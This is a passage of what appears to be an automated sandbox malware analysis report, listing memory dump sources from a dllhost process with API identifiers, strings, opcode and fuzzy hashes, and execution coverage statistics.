                          • Instruction Fuzzy Hash: 0E91EF3261A7519DFB608F6594983AD3BA0F768BE8F568116DE4E63B85DB34C4C6C300
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000279A92B28DF), ref: 00000279A92B2A12
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: a8a9a555139851c89c710fbbb681e278028ba85b2748614109280be0a71c0be8
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction Fuzzy Hash: AD91D03261A7508DFB609F65989C7AD3BE0F368BA8F564116DE4F67A85DB34C4C6C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: d3181fef0d0cd5f21aefe899bda2cb7842efd0cf40178a01e55efd2fdaa4f902
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: B2115E26716F048EEB00CFA4E8583A933A4F719768F450E21DE6D867A4EF78C1A4C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: fd429c5f807c8de5c839ed2e1630412f0ed6e0d7b88a26906a717878dcfa7419
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: 5E110C26756F048EEF00CF60E8593A933A4F759768F451E25DE6D867A4DF78C1948340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: 035b562e233aa759943cf278604ed79818b811227b26b073b90623da50a005c4
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: DA71E436219B828AE774DF2A99483FA6794F385BE4F560026DD4D73F89DE34C680C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: 5dce73a89741d877e67987f317cea42e812193cb17133b0bec1210d0f9f9a3a8
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: F371D737219B8249E774DF26999C3EA6794F385BE4F560016DD0E53F89DE34CA80C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm
                          • API String ID: 3242871069-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 4f14442ffbddefea8021bd7d1f5886bf31ebb2b40bacc41b4783080624a617f6
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: CA517F3232BB408EEB54CF19E448B697791F794BA8F168525DE6E4B78CDB79C881C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: cd14a9a2cc01589e76b2a960366dcf6dc740fdef59b757029546620e3f38c428
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 5E618C36509BC48AEB719F15E44479AB7A0F7C9BA8F058215EF9C07B99CB78C1D0CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: b1fde369eac3f7b3364421eba18d15ba7ab4723258cf6f9bcd989d3449fc874c
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: 2651143620E7819AFB24DE3AA55C3AA6795F3C4BA0F564025CE4D63F89DE39C4C4C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: b0ba01b053ee4cf30f9de35873d4cbe59e27677d5b56eaab2a133bf38cdcec68
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: 5851172720E78189FB64DE39A89C3AA6791F385BA0F460025DD5D43F99DE39CEC4C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: 0cafe1bd4bef3c4af76d395c55d7aac122a0ff5cd2a2a8185e514eebb4aaf477
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: A041097262AB808AE720DF66E4487DAB7A4F3587E4F918121EE4D87758EF3CC481C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: 5b8d877bd39ad06b0551107a96cb3f93cf9d695089a2309253a988dfb06fd14c
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: 5141D97362AB808AE750DF65E44C79AB7E4F3587A4F454121EE4E87754EF38C481CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: 0ef5216e11e82ccbb8c93b1f46ae9a13059d3812fde6b0107ac2cac2b68c0841
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 4C113D36219B8086EB218F15F448259B7E5F788BA4F598264EE8D07B68DF3CC5A1CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: bb0137db9af0e3c478c299a86958ad44422e4f731d942471ca42172c9c9be055
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 3B113D36219B8086EB618F19F448259B7E5F798BA4F594220EF8D07B64DF3CC991CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: ntdll.dll
                          • API String ID: 1646373207-2227199552
                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: 8fc56203a431a98e9b95bc85fed72bacdcaf30a18674613168ee9c7acf2ef07f
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: FB118025A16B8089EB14DF66A84C65977B0FB88FE0F5A8128DE4E53765EF38D482C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: d5622158ad8d5f18c24ad096998ea8dcead447809a86f5dc738eb04bd5c4de46
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: 1811C026A1AF8089EB15DB66A80C25977F0F788FE0F5A4024DF4E57725EF38D482C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: 07ef75b36cd48f40e8c93a33e9a97ccd4155f91f686b8a431e7d2a10fb791518
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: CDE06535A02B049EE7288F62D80C74936E1FB88F25F4AC024CD0D07360EF7D84D98B80
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: a0b9e583586c0f11b707b6da49ec884c94a9f86045a740cecfdfd5e7588ccdcd
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: F5E06D356227049EE7148F62D80C74936E1FB88F25F46C024CD0E0B350EF7D94D98740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: 9f35fee8613f69eed9fb7f34a4fdd82bb69d687884a5d1f3ce5aab10689d7f68
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: 17E0E575612A04AAE7289F62D80865976A1FB88F25F8AC064CD0907320EE3C84D99B10
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: 2e01c5741c952e24420e10818d2298834863190f059fa9e2f1f0483336d9af7b
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: 02E0ED756226049AE7199B62D80C65976E1FB88B25F458024CD0A0B310EE3C94D99610
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:483
                          Total number of Limit Nodes:28
